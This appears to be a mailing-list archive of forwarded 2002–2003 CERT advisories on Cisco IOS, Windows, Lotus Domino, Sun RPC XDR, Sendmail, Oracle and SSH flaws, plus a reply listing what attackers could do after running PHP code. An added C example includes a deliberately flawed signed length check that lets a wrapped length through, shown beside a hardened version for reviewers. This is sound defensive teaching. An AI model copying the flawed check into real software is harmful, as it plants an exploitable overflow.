CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet (fwd)

2003-07-17 Thread Muhammad Faisal Rauf Danka


Regards

Muhammad Faisal Rauf Danka


*** There is an attachment in this mail. ***

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED], No Ads, 6MB,
IMAP, POP, SMTP & more! http://www.everyone.net/selectmail?campaign=tag
---BeginMessage---


-BEGIN PGP SIGNED MESSAGE-

CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

   Original release date: July 16, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * All  Cisco  devices  running  Cisco IOS software and configured to
   process Internet Protocol version 4 (IPv4) packets

Overview

   A  vulnerability in many versions of Cisco IOS could allow an intruder
   to execute a denial-of-service attack against a vulnerable device.

I. Description

   Cisco  IOS  is  a  very  widely  deployed  network operating system. A
   vulnerability   in   IOS   could   allow  an  intruder  to  execute  a
   denial-of-service   attack  against  an  affected  device.  Cisco  has
   published an advisory on this topic, available at
   http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
   We  strongly  encourage sites using IOS to read this document and take
   appropriate action.

   The CERT/CC is tracking this issue as VU#411332. This reference number
   corresponds to CVE candidate CAN-2003-0567.

II. Impact

   By  sending  specially  crafted  IPv4  packets  to  an  interface on a
   vulnerable device, an intruder can cause the device to stop processing
   packets destined to that interface. Quoting from Cisco's advisory:

   A device receiving these specifically crafted IPv4 packets will force
   the  inbound interface to stop processing traffic. The device may stop
   processing  packets destined to the router, including routing protocol
   packets  and  ARP  packets.  No alarms will be triggered, nor will the
   router  reload  to  correct  itself.  This  issue can affect all Cisco
   devices   running  Cisco  IOS  software.  This  vulnerability  may  be
   exercised  repeatedly  resulting  in  loss  of  availability  until  a
   workaround has been applied or the device has been upgraded to a fixed
   version of code.

III. Solution

Apply a patch from Cisco

   Apply a patch as described in Cisco's Advisory.

   Until  a patch can be applied, you can mitigate the risks presented by
   this  vulnerability  by  judicious use of access control lists (ACLs).
   The  correct  use  of  ACLs  depends  on  your  network  topology.
   Additionally,  ACLs  may  degrade  performance  on  some  systems.  We
   recommend reviewing the following before applying ACLs:

   http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml#workarounds
   http://www.cisco.com/warp/public/707/racl.html
   http://www.cisco.com/warp/public/707/iacl.html

   The  CERT  Coordination  Center  thanks  Cisco Systems for notifying us
   about this problem and for helping us to construct this advisory.

   Feedback  about  this  advisory  may  be directed to the author, Shawn
   Hernan

   This document is available from:
   http://www.cert.org/advisories/CA-2003-15.html

CERT/CC Contact Information

   Email: [EMAIL PROTECTED]
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
   CERT Coordination Center
   Software Engineering Institute
   Carnegie Mellon University
   Pittsburgh PA 15213-3890
   U.S.A.

   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.

Using encryption

   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key

   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information.

Getting security information

   CERT  publications  and  other security information are available from
   our web site
   http://www.cert.org/

   To  subscribe  to  the CERT mailing list for advisories and bulletins,
   send  email  to [EMAIL PROTECTED]. Please include in the body of your
   message

   subscribe cert-advisory

   *  CERT  and  CERT  Coordination Center are registered in the U.S.
   Patent and Trademark Office

CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML (fwd)

2003-07-16 Thread Muhammad Faisal Rauf Danka



CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML
Conversion Library

   Original issue date: July 14, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history is at the end of this file.


Systems Affected

 * Windows 98 and 98 Second Edition (SE)
 * Windows NT 4.0 and 4.0 Terminal Server Edition (TSE)
 * Windows Millennium Edition (Me)
 * Windows 2000
 * Windows XP
 * Windows Server 2003


Overview

   A  buffer  overflow  vulnerability  exists in a shared HTML conversion
   library  included in Microsoft Windows. An attacker could exploit this
   vulnerability to execute arbitrary code or cause a denial of service.


I. Description

   Microsoft   Windows   includes   a   shared  HTML  conversion  library
   (html32.cnv).  According to Microsoft Security Bulletin MS03-023, "The
   HTML  converter  is  an extension which allows applications to convert
   HTML data into Rich Text Format (RTF) while maintaining the formatting
   and  structure  of  the  data  as well as the text. The converter also
   supports the conversion of RTF data into HTML."

   The  HTML  conversion library contains a buffer overflow vulnerability
   that  can  be  triggered  by a specially crafted align attribute in an
   HR  element.  The  library  can  be loaded by any application on the
   system. For example, Internet Explorer (IE) uses the library to handle
   HTML data stored in the clipboard. Using script, an attacker can cause
   IE  to  copy  a  crafted  HR element into the clipboard and load the
   library.  The attacker could accomplish this by convincing a victim to
   view  an  HTML  web  page  or  HTML email message with IE, Outlook, or
   Outlook  Express  in  a  zone  where  Active scripting and Allow paste
   operations via script are enabled.

   This  vulnerability is not limited to IE, Outlook, or Outlook Express.
   Any   program,  including  non-Microsoft  applications,  can  use  the
   vulnerable library and may present other vectors of attack.

   Further  information is available in VU#823260. Common Vulnerabilities
   and Exposures (CVE) refers to this issue as CAN-2003-0469.


II. Impact

   An  attacker  could  execute arbitrary code with the privileges of the
   process  that  loaded  the HTML conversion library. The attacker could
   also crash the process, causing a denial of service.


III. Solution

Apply a patch

   Apply  the  appropriate  patch  as  specified  by  Microsoft  Security
   Bulletin MS03-023.

Modify Internet Explorer security zone configuration

   Modify  one  or both of the following IE security zone settings in the
   Internet  zone  and  the zone(s) used by Outlook, Outlook Express, and
   any  other  application  that uses Internet Explorer or the WebBrowser
   ActiveX control to render HTML:

 * Set "Allow paste operations via script" to Disable

 * Set "Active scripting" to Disable

   Either  of these changes will prevent attacks that depend on scripting
   in  the  IE  HTML  rendering  engine.  However,  these changes are not
   complete  solutions,  and  they  do not prevent attacks that use other
   vectors.

   Note  that  disabling  Active scripting provides defense against other
   attacks that are outside the scope of this document.

   Instructions for modifying IE 5 security zone settings can be found in
   the CERT/CC Malicious Web Scripts FAQ. In IE 6, the High security zone
   setting includes both of these changes.


Appendix A. Vendor Information

   This  appendix  contains information provided by vendors. When vendors
   report  new  information,  this section is updated and the changes are
   noted  in  the  revision  history. If a vendor is not listed below, we
   have not received their comments.

Microsoft

 Please see Microsoft Security Bulletin MS03-023.


Appendix B. References

 * CERT/CC Vulnerability Note VU#823260 -
   http://www.kb.cert.org/vuls/id/823260
 * Microsoft Security Bulletin MS03-023 -
   http://microsoft.com/technet/security/bulletin/MS03-023.asp


   This vulnerability was publicly reported by Digital Scream.

   Feedback can be directed to the author, Art Manion.

   This document is available from:
   http

Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function

2003-04-04 Thread Muhammad Faisal Rauf Danka
Just to add a little more to what Mr Jedi said,

Only allowing PHP code of the choice may also end up in infinite loops causing denial 
of service. Including that, they may attempt to establish connection with other 
machines, within the LAN or imagine bruteforcing SQL servers on the internet, or 
banner grabbing for that matter. 

Having the apache or nobody privileges, the attacker could do:

- privilege escalation by using local vulnerabilities.
- destroy/ delete/ tamper the logfiles.
- destroy / delete/ tamper the webpages of other customers.
- use it as a launchpad to attack other machines.
- use it for mailbombing / spam / DoS / DDoS / Warez / Bouncing.


Regards

Muhammad Faisal Rauf Danka


--- Jedi/Sector One [EMAIL PROTECTED] wrote:
On Thu, Apr 03, 2003 at 08:39:03AM +0200, Goran Krajnovic wrote:
 This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with
 the user-id of the web server process (usually a low privilege user like
 'nobody' or 'apache').
[snip snip]
 If an attacker has the opportunity to execute PHP code of his choice on a
 target server [1], he does not need to exploit a buffer overflow in PHP just to
 get the privileges of the web server user

  You missed an important point.
  
  Hosting services offering a PHP interpreter to untrusted people rely on
PHP features to restrict their field of action.

  Specifically, the open_basedir and safe_mode features are a must to avoid
people going outside their home directory with PHP scripts.

  If arbitrary code can be run through a PHP vulnerability, these
restrictions disappear. People can walk through files that are supposed to
be inaccessible.

  Given that many people just chmod -R 777 their directories when their
script doesn't work and leave plaintext SQL passwords everywhere, this is
definitely an issue.

  Also don't forget that all PHP extensions aren't always enabled. For
instance, the socket extension is typically disabled by most hosting service
providers for obvious reasons.

  Once and again, a vulnerability in the PHP interpreter can bypass this
restriction and gain access to other machines of the LAN, run DOS agents, etc.

  Of course, one shouldn't rely 100% on PHP userland security barriers, this
is where tools like NetBSD/OpenBSD's systrace can really add another
efficient layer of security.

-- 
Frank DENIS (Jedi/Sector One) [EMAIL PROTECTED]
Secure FTP Server: http://www.PureFTPd.Org/
Misc. free software: http://www.Jedi.Claranet.Fr/



Fwd: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

2003-03-27 Thread Muhammad Faisal Rauf Danka



CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

   Original release date: March 26, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold
 * VU#571297 affects 5.0.12, 6.0.1 and prior versions.

Overview

   Multiple  vulnerabilities  have  been  reported  to affect Lotus Notes
   clients  and Domino servers. Multiple reporters, the close timing, and
   some ambiguity caused confusion about what releases are vulnerable. We
   are  issuing  this  advisory  to  help  clarify  the  details  of  the
   vulnerabilities,  the  versions affected, and the patches that resolve
   these issues.

I. Description

   In  February  2003, NGS Software released several advisories detailing
   vulnerabilities  affecting  Lotus  Notes  and  Domino.  The  following
   vulnerabilities  reported  by  NGS  Software  affect versions of Lotus
   Domino prior to 5.0.12 and 6.0:

 VU#206361   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields FolderName field
 Lotus Technical Documentation: KSPR5HUQ59
 NGS Software's Advisory: NISR17022003b

 VU#355169 - Lotus Domino Web Server vulnerable to denial of service
 via incomplete POST request
 Lotus Technical Documentation: KSPR5HTQHS
 NGS Software's Advisory: NISR17022003d

 VU#542873   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields s_ViewName field
 Lotus Technical Documentation: KSPR5HUPEK
 NGS Software's Advisory: NISR17022003b

 VU#772817  -  Lotus Domino Web Server vulnerable to buffer overflow
 via  non-existent  h_SetReturnURL  parameter  with an overly long
 Host Header field
 Lotus Technical Documentation: KSPR5HTLW6
 NGS Software's Advisory: NISR17022003a

   The  following vulnerability reported by NGS Software affects versions
   of Lotus Domino up to and including 5.0.12 and 6.0.1:

 VU#571297  -  Lotus  Notes  and  Domino  COM Object Control Handler
 contains buffer overflow
 Lotus Technical Documentation: SWG21104543
 NGS Software's Advisory: NISR17022003e

   VU#571297  was  originally  reported  as  a vulnerability in an iNotes
   ActiveX  control.  The  vulnerable  code  is not specific to iNotes or
   ActiveX.  The  iNotes  ActiveX  control  was  an attack vector for the
   vulnerability and is not the affected code base. Because this issue is
   not  specific  to  ActiveX,  Lotus  Notes  clients  and Domino Servers
   running on platforms other than Microsoft Windows may be affected.

   In March 2003, Rapid7, Inc. released several advisories. The following
   vulnerabilities,  reported  by  Rapid7, Inc., affect versions of Lotus
   Domino prior to 5.0.12:

 VU#433489 - Lotus Domino Server susceptible to a pre-authentication
 buffer overflow during Notes authentication
 Lotus Technical Documentation: DBAR5CJJJS
 Rapid7, Inc.'s Advisory: R7-0010

 VU#411489  -  Lotus Domino Web Retriever contains a buffer overflow
 vulnerability
 Lotus Technical Documentation: KSPR5DFJTR
 Rapid7, Inc.'s Advisory: R7-0011

   Rapid7,  Inc.  also  discovered that Lotus Domino pre-release and beta
   versions of 6.0 were also affected by the following vulnerability:

 VU#583184  -  Lotus  Domino  R5  Server  Family  contains  multiple
 vulnerabilities in LDAP handling code
 Lotus Technical Documentation: DWUU4W6NC8
 Rapid7, Inc.'s Advisory: R7-0012

   VU#583184  was  a  regression  of  the  PROTOS  LDAP  Test-Suite  from
   CA-2001-18 and was originally fixed in 5.0.7a.

II. Impact

   The  impact  of  these vulnerabilities ranges from denial of service to
   data  corruption  and  the  potential  to  execute arbitrary code. For
   details  about  the impact of a specific vulnerability, please see the
   related vulnerability note.

III. Solution

 Upgrade

   Most  of  these  vulnerabilities  are  resolved in versions 5.0.12 and
   6.0.1 of Lotus Domino.

   Only  VU#571297,  Lotus  Notes  and Domino COM Object Control Handler
   contains  buffer  overflow,  is  not  resolved  in  5.0.12, or 6.0.1.
   Critical  Fix  1  for 6.0.1 was released on March 18, 2003, to resolve
   this issue for both the Notes client and Domino server.

 Apply a patch

   Patches  are  available  for  some  vulnerabilities.  Please  view

Fwd: CERT Advisory CA-2003-10 Integer overflow in Sun RPC XDR library routines

2003-03-20 Thread Muhammad Faisal Rauf Danka


CERT Advisory CA-2003-10 Integer overflow in Sun RPC XDR library routines

   Original release date: March 19, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   Applications  using  vulnerable  implementations of SunRPC-derived XDR
   libraries, which include
 * Sun Microsystems network services library (libnsl)
 * BSD-derived libraries with XDR/RPC routines (libc)
 * GNU C library with sunrpc (glibc)

Overview

   There  is  an  integer  overflow  in  the  xdrmem_getbytes()  function
   distributed as part of the Sun Microsystems XDR library. This overflow
   can   cause   remotely   exploitable   buffer  overflows  in  multiple
   applications, leading to the execution of arbitrary code. Although the
   library  was  originally  distributed  by  Sun  Microsystems, multiple
   vendors   have   included   the   vulnerable   code   in   their   own
   implementations.

I. Description

   XDR  (external  data  representation)  libraries  are  used to provide
   platform-independent  methods for sending data from one system process
   to  another,  typically  over  a network connection. Such routines are
   commonly  used  in  remote  procedure  call  (RPC)  implementations to
   provide transparency to application programmers who need to use common
   interfaces  to  interact  with  many  different  types of systems. The
   xdrmem_getbytes()   function  in  the  XDR  library  provided  by  Sun
   Microsystems  contains an integer overflow that can lead to improperly
   sized  dynamic  memory  allocation.  Depending  on  how  and where the
   vulnerable  xdrmem_getbytes()  function  is  used, subsequent problems
   like buffer overflows may result.

   Researchers at eEye Digital Security discovered this vulnerability and
   have also published an advisory. This issue is currently being tracked
   as  VU#516825  by  the  CERT/CC  and  as  CAN-2003-0028  in the Common
   Vulnerabilities   and  Exposures  (CVE)  dictionary.  Note  that  this
   vulnerability is similar to, but distinct from, VU#192995. 
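   The advisory describes the defect only as an integer overflow in the
   length handling of xdrmem_getbytes() and shows no code. The following C
   example is added here (it is not the Sun, BSD or glibc source) and models
   that class of bug: a signed "bytes remaining" counter that is decremented by
   a caller-supplied length, beside the unsigned compare-before-subtract form,
   plus a small XDR opaque decoder built on the hardened check and run over
   constructed wire bytes. The memstream type, the sample bytes and every
   function name are constructed for this illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed stand-in for an XDR memory stream: a cursor into a fixed
 * buffer plus the count of unread bytes. This is NOT the real struct XDR. */
typedef struct {
    const unsigned char *cur;
    uint32_t handy;          /* bytes still unread; deliberately unsigned */
} memstream;

/* The fragile pattern: a 32-bit *signed* "bytes remaining" counter is
 * decremented by the caller-supplied length and then tested for negativity.
 * For ordinary lengths this works (100 - 200 is negative and is rejected),
 * but a length close to 2^32 wraps the subtraction back into positive
 * territory and the check passes although far more than `handy` bytes were
 * requested. The wrap is emulated with unsigned arithmetic so this stays
 * defined C; in real code the same thing happens through signed overflow. */
bool lengthcheck_signed(int32_t handy, uint32_t len) {
    uint32_t after = (uint32_t)handy - len;   /* two's-complement result */
    return after < 0x80000000u;               /* "sign bit clear" == accepted */
}

/* Hardened form: compare first, entirely in unsigned arithmetic. No
 * intermediate value can wrap, so a huge length is always rejected. */
bool lengthcheck_unsigned(uint32_t handy, uint32_t len) {
    return len <= handy;
}

/* xdrmem_getbytes-style copy built on the hardened check. Copies nothing and
 * returns false when the request exceeds the stream or the destination. */
bool mem_getbytes(memstream *xs, unsigned char *dst, size_t dstcap, uint32_t len) {
    if (!lengthcheck_unsigned(xs->handy, len) || len > dstcap) return false;
    memcpy(dst, xs->cur, len);
    xs->cur += len;
    xs->handy -= len;
    return true;
}

/* Decode one XDR "opaque": big-endian uint32 length, the bytes, then padding
 * to a 4-byte boundary. The declared length is attacker-controlled input. */
bool mem_get_opaque(memstream *xs, unsigned char *dst, size_t dstcap, uint32_t *outlen) {
    unsigned char w[4];
    if (!mem_getbytes(xs, w, sizeof w, 4)) return false;
    uint32_t n = ((uint32_t)w[0] << 24) | ((uint32_t)w[1] << 16) |
                 ((uint32_t)w[2] << 8) | (uint32_t)w[3];
    if (!mem_getbytes(xs, dst, dstcap, n)) return false;   /* rejects a huge n */
    uint32_t pad = (4 - (n & 3)) & 3;
    if (pad && !mem_getbytes(xs, w, sizeof w, pad)) return false;
    *outlen = n;
    return true;
}

/* Is the signed check fooled by a ~4 GiB length when only 100 bytes remain? */
bool demo_signed_check_fooled(void) {
    return lengthcheck_signed(100, 0xFFFFFFF0u);   /* true: the wrap slips through */
}

/* Decode a constructed opaque ("hello") and then reject a second one whose
 * declared length is 0xFFFFFFF0. Returns 1 when both behave as intended. */
int demo_decode(void) {
    /* constructed wire bytes: len=5, "hello", 3 pad bytes, then len=0xFFFFFFF0 */
    static const unsigned char wire[] = {
        0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o', 0, 0, 0, 0xFF, 0xFF, 0xFF, 0xF0
    };
    memstream xs = { wire, (uint32_t)sizeof wire };
    unsigned char out[16];
    uint32_t n = 0;
    if (!mem_get_opaque(&xs, out, sizeof out, &n)) return 0;
    if (n != 5 || memcmp(out, "hello", 5) != 0) return 0;
    if (mem_get_opaque(&xs, out, sizeof out, &n)) return 0;  /* must fail */
    return 1;
}
```

   The point for reviewers of any decoder, not only XDR: a bounds check that
   subtracts first and inspects the sign afterwards is only as good as the
   width of the counter, and a length field taken from the wire can always be
   chosen to wrap it. Comparing the length against the remaining count before
   touching either value removes that possibility.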

II. Impact

   Because  SunRPC-derived XDR libraries are used by a variety of vendors
   in  a  variety  of  applications,  this defect may lead to a number of
   security  problems.  Exploiting this vulnerability will lead to denial
   of  service,  execution  of  arbitrary  code,  or  the  disclosure  of
   sensitive information.

   Specific  impacts  reported  include  the ability to crash the rpcbind
   service  and  possibly execute arbitrary code with root privileges. In
   addition, intruders may be able to crash the MIT KRB5 kadmind or cause
   it to leak sensitive information, such as secret keys.

III. Solution

Apply a patch from your vendor

   Apply  the  appropriate  patch or upgrade as specified by your vendor.
   See Appendix A below and the Systems Affected section of VU#516825 for
   further information.

   Note  that  XDR libraries can be used by multiple applications on most
   systems.  It may be necessary to upgrade or apply multiple patches and
   then recompile statically linked applications.

   Applications  that  are  statically  linked  must  be recompiled using
   patched  libraries.  Applications  that  are dynamically linked do not
   need  to be recompiled; however, running services need to be restarted
   in order to use the patched libraries.

   System  administrators  should  consider  the  following  process when
   addressing this issue:
1. Patch or obtain updated XDR/RPC libraries.
2. Restart  any  dynamically  linked  services  that  make use of the
   XDR/RPC libraries.
3. Recompile  any statically linked applications using the patched or
   updated XDR/RPC libraries.

Disable access to vulnerable services or applications

   Until  patches  are  available  and  can  be  applied, you may wish to
   disable   access   to  services  or  applications  compiled  with  the
   vulnerable xdrmem_getbytes() function.

   As a best practice, the CERT/CC recommends disabling all services that
   are not explicitly required.

Appendix A. - Vendor Information

   This  appendix  contains  information  provided  by  vendors  for this
   advisory.  As  vendors  report new information to the CERT/CC, we will
   update this section and note the changes in our revision history. If a
   particular  vendor  is  not  listed  below, we have not received their
   comments.

Apple Computer, Inc.

   Mac  OS  X  

Fwd: CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail

2003-03-04 Thread Muhammad Faisal Rauf Danka


CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail

   Original release date: March 3, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * Sendmail Pro (all versions)
 * Sendmail Switch 2.1 prior to 2.1.5
 * Sendmail Switch 2.2 prior to 2.2.5
 * Sendmail Switch 3.0 prior to 3.0.3
 * Sendmail for NT 2.X prior to 2.6.2
 * Sendmail for NT 3.0 prior to 3.0.3
 * Systems  running  open-source  sendmail  versions prior to 8.12.8,
   including UNIX and Linux systems

Overview

   There  is  a vulnerability in sendmail that may allow remote attackers
   to gain the privileges of the sendmail daemon, typically root.

I. Description

   Researchers  at  Internet  Security  Systems  (ISS)  have discovered a
   remotely  exploitable  vulnerability  in  sendmail. This vulnerability
   could  allow  an  intruder  to  gain  control of a vulnerable sendmail
   server.

   Most  organizations  have  a variety of mail transfer agents (MTAs) at
   various  locations  within their network, with at least one exposed to
   the   Internet.   Since   sendmail  is  the  most  popular  MTA,  most
   medium-sized  to  large  organizations are likely to have at least one
   vulnerable   sendmail   server.  In  addition,  many  UNIX  and  Linux
   workstations  provide  a  sendmail  implementation that is enabled and
   running by default.

   This  vulnerability  is  message-oriented  as  opposed  to
   connection-oriented. That means that the vulnerability is triggered by
   the  contents  of  a  specially-crafted  email  message rather than by
   lower-level  network  traffic.  This  is important because an MTA that
   does  not  contain  the  vulnerability will pass the malicious message
   along  to  other  MTAs  that may be protected at the network level. In
   other  words, vulnerable sendmail servers on the interior of a network
   are  still  at risk, even if the site's border MTA uses software other
   than sendmail. Also, messages capable of exploiting this vulnerability
   may pass undetected through many common packet filters or firewalls.

   Sendmail has indicated to the CERT/CC that this vulnerability has been
   successfully  exploited in a laboratory environment. We do not believe
   that   this   exploit  is  available  to  the  public.  However,  this
   vulnerability  is  likely  to  draw  significant  attention  from  the
   intruder community, so the probability of a public exploit is high.

   A  successful  attack  against  an  unpatched sendmail system will not
   leave any messages in the system log. However, on a patched system, an
   attempt  to  exploit  this  vulnerability will leave the following log
   message:

 Dropped invalid comments from header address

   Although  this does not represent conclusive evidence of an attack, it
   may be useful as an indicator.

   A  patched  sendmail server will drop invalid headers, thus preventing
   downstream servers from receiving them.

   The CERT/CC is tracking this issue as VU#398025. This reference number
   corresponds to CVE candidate CAN-2002-1337.

   For more information, please see

   http://www.sendmail.org
   http://www.sendmail.org/8.12.8.html
   http://www.sendmail.com/security/
   http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
   http://www.kb.cert.org/vuls/id/398025

II. Impact

   Successful exploitation of this vulnerability may allow an attacker to
   gain  the  privileges  of  the  sendmail  daemon, typically root. Even
   vulnerable  sendmail servers on the interior of a given network may be
   at  risk  since  the vulnerability is triggered from the contents of a
   malicious email message.

III. Solution

Apply a patch from Sendmail

   Sendmail  has produced patches for versions 8.9, 8.10, 8.11, and 8.12.
   However,  the  vulnerability  also  exists  in earlier versions of the
   code;  therefore,  site  administrators  using  an earlier version are
   encouraged to upgrade to 8.12.8. These patches are located at

   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch
   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch
   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch

Apply a patch from your vendor

   Many  vendors  include  vulnerable  sendmail  servers as part of their
   software distributions. We have notified vendors 

Fwd: CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers

2003-02-20 Thread Muhammad Faisal Rauf Danka


CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers

   Original release date: February 19, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * Systems running Oracle9i Database (Release 1 and 2)
 * Systems running Oracle8i Database v 8.1.7
 * Systems running Oracle8 Database v 8.0.6
 * Systems  running  Oracle9i  Application  Server (Release 9.0.2 and 9.0.3)

Overview

   Multiple  vulnerabilities  exist  in  Oracle software that may lead to
   execution  of  arbitrary  code; the ability to read, modify, or delete
   information  stored  in  underlying  Oracle  databases;  or  denial of
   service.   All   of  these  vulnerabilities  were  discovered  by  Next
   Generation Security Software Ltd.

I. Description

   Multiple   vulnerabilities   exist  in  Oracle9i  Application  Server,
   Oracle9i  Database,  and  Oracle8i  Database.  The  majority  of these
   vulnerabilities are buffer overflows.

   Oracle has published Security Alerts describing these vulnerabilities.
   If you use Oracle products listed in the Systems Affected section of
   this  document,  we  strongly  encourage  you  to review the following
   Oracle Security Alerts and apply patches as appropriate:

 * Buffer Overflow in DIRECTORY parameter of Oracle9i Database Server
   http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf

 * Buffer Overflow in TZ_OFFSET function of Oracle9i Database Server
   http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf

 * Buffer  Overflow  in TO_TIMESTAMP_TZ function of Oracle9i Database Server
   http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf

 * Buffer Overflow in ORACLE.EXE binary of Oracle9i Database Server
   http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf

 * Two Vulnerabilities in Oracle9i Application Server
   http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf

   NGSSoftware  Insight  Security  Research  Advisories  describing these
   issues are listed below:

 * Oracle9i Application Server Format String Vulnerability
   http://www.nextgenss.com/advisories/ora-appservfmtst.txt

 * Oracle TO_TIMESTAMP_TZ Remote System Buffer Overrun
   http://www.nextgenss.com/advisories/ora-tmstmpbo.txt

 * ORACLE bfilename function buffer overflow vulnerability
   http://www.nextgenss.com/advisories/ora-bfilebo.txt

 * Oracle TZ_OFFSET Remote System Buffer Overrun
   http://www.nextgenss.com/advisories/ora-tzofstbo.txt

 * Oracle unauthenticated remote system compromise
   http://www.nextgenss.com/advisories/ora-unauthrm.txt

   The CERT/CC has published vulnerability notes for each of these issues
   as  well. The vulnerability in Oracle's mod_dav module (VU#849993) has
   been assigned CVE ID CAN-2002-0842.

II. Impact

   Depending  on  the  vulnerability  being exploited, an attacker may be
   able  to  execute  arbitrary code; read, modify, or delete information
   stored  in  underlying Oracle databases; or cause a denial of service.
   The vulnerabilities in ORACLE.EXE (VU#953746) and the WebDAV modules
   (VU#849993, VU#511194) may be exploited prior to authentication.

III. Solution

Apply a patch

   Solutions  for  specific  vulnerabilities  can  be  found in the above
   referenced   Oracle  Security  Alerts,  NGSSoftware  Insight  Security
   Research Advisories, and individual CERT/CC Vulnerability Notes.

Mitigation Strategies

   Until  a  patch can be applied, the CERT/CC recommends that vulnerable
   sites

 * disable unnecessary Oracle services
 * run Oracle services with the least privilege
 * restrict network access to Oracle services

Appendix A. Vendor Information

   This  appendix  contains information provided by vendors. When vendors
   report  new  information,  this section is updated and the changes are
   noted  in  the  revision  history. If a vendor is not listed below, we
   have not received their comments.

Oracle Corporation

 Please see the following Oracle Security Alerts:

 * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf 
 * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf 
 * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf 
 * 

Fwd: CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations

2002-12-17 Thread Muhammad Faisal Rauf Danka



CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations

   Original issue date: December 16, 2002
   Last revised: --
   Source: CERT/CC

   A complete revision history is at the end of this file.


Systems Affected

 * Secure  shell  (SSH)  protocol  implementations in SSH clients and
   servers from multiple vendors


Overview

   Multiple  vendors' implementations of the secure shell (SSH) transport
   layer  protocol  contain  vulnerabilities  that  could  allow a remote
   attacker  to  execute  arbitrary  code  with the privileges of the SSH
   process  or  cause a denial of service. The vulnerabilities affect SSH
   clients  and  servers, and they occur before user authentication takes
   place.


I. Description

   The SSH protocol enables a secure communications channel from a client
   to a server. From the IETF draft SSH Transport Layer Protocol:

 The  SSH  transport layer is a secure low level transport protocol.
 It  provides  strong encryption, cryptographic host authentication,
 and  integrity  protection. ... Key  exchange  method,  public  key
 algorithm,  symmetric  encryption algorithm, message authentication
 algorithm, and hash algorithm are all negotiated.

   Rapid7  has  developed  a suite (SSHredder) of test cases that examine
   the  connection  initialization,  key  exchange, and negotiation phase
   (KEX,  KEXINIT)  of  the SSH transport layer protocol. The suite tests
   the  way  an  SSH  transport  layer  implementation handles invalid or
   incorrect  packet  and  string  lengths,  padding  and padding length,
   malformed strings, and invalid algorithms.

   The  test  suite  has  demonstrated  a  number  of  vulnerabilities in
   different  vendors' SSH products. These vulnerabilities include buffer
   overflows,  and they occur before any user authentication takes place.
   SSHredder  was  primarily  designed  to  test  key  exchange and other
   processes that are specific to version 2 of the SSH protocol; however,
   certain classes of tests are also applicable to version 1.

   Further  information about this set of vulnerabilities may be found in
   Vulnerability Note VU#389665.

   Rapid7  has  published a detailed advisory (R7-0009) and the SSHredder
   test suite.

   Common  Vulnerabilities and Exposures (CVE) has assigned the following
   candidate numbers for several classes of tests performed by SSHredder:

 * CAN-2002-1357 - incorrect field lengths
 * CAN-2002-1358 - lists with empty elements or multiple separators
 * CAN-2002-1359 - classic buffer overflows
 * CAN-2002-1360 - null characters in strings


II. Impact

   The  impact  will vary for different vulnerabilities and products, but
   in  severe  cases,  remote attackers could execute arbitrary code with
   the  privileges  of  the SSH process. Both SSH servers and clients are
   affected,  since  both  implement the SSH transport layer protocol. On
   Microsoft  Windows  systems,  SSH  servers  commonly  run  with SYSTEM
   privileges,  and  on UNIX systems, SSH daemons typically run with root
   privileges.  In  the  case  of SSH clients, any attacker-supplied code
   would  run  with  the  privileges  of  the user who started the client
   program,  with  the  possible  exception  of  SSH  clients that may be
   configured  with an effective user ID of root (setuid root). Attackers
   could  also  crash  a  vulnerable  SSH  process,  causing  a denial of
   service.


III. Solution

Apply a patch or upgrade

   Apply  the  appropriate  patch or upgrade as specified by your vendor.
   See Appendix A below and the Systems Affected section of VU#389665 for
   specific information.

Restrict access

